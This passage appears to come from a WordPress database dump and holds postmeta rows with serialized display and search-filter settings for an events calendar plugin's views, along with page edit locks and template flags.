0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"weekly_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"timetable\";a:18:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:7:\"masonry\";a:22:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:5:\"cover\";a:12:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"266611\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"countdown\";a:12:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:14:\"available_spot\";a:9:{s:5:\"style\";s:7:\"classic\";s:19:\"fluent_date_format1\";s:3:\"F d\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"carousel\";a:26:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:10:\"navigation\";s:1:\"0\";s:15:\"dots_navigation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"slider\";a:28:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:15:\"transition_time\";s:3:\"250\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"timeline\";a:17:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:16:\"general_calendar\";a:8:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:10:\"more_event\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:14:\"thumbnail_size\";a:2:{s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}}'),(137319,264415,'sf-options','a:12:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:16:\"general_calendar\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(137320,264415,'sf_status','0'),(137321,264415,'sf_display_label','0'),(137322,264415,'show_past_events','1'),(137323,264415,'show_only_past_events','0'),(137324,264415,'show_only_ongoing_events','0'),(137325,264416,'protect_children',''),(137326,264416,'_edit_lock','1653579421:23'),(137327,264416,'_edit_last','2'),(137328,264416,'_wp_page_template','default'),(137329,264416,'passster_activate_global_protection',NULL),(137330,264416,'passster_activate_protection',NULL),(137331,264416,'passster_protection_type','password'),(137332,264416,'boldgrid_hide_page_title','0'),(137333,264416,'boldgrid_in_page_containers','1'),(137334,264416,'bgseo_robots_index','index'),(137335,264416,'bgseo_robots_follow','follow'),(137336,264415,'_edit_lock','1654657373:2'),(137337,264430,'protect_children',''),(137338,264430,'_edit_lock','1653365779:2'),(137339,264430,'_edit_last','2'),(137340,264431,'protect_children',''),(137341,264431,'label',''),(137342,264431,'category','114'),(137343,264431,'location',''),(137344,264431,'organizer',''),(137345,264431,'tag',''),(137346,264431,'author',''),(137347,264431,'skin','monthly_view'),(137348,264431,'sk-options','a:20:{s:4:\"list\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:6:\"F d, Y\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:4:\"grid\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:9:\"D, F d, Y\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"agenda\";a:18:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:13:\"full_calendar\";a:31:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"yearly_view\";a:16:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:12:\"monthly_view\";a:17:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"weekly_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"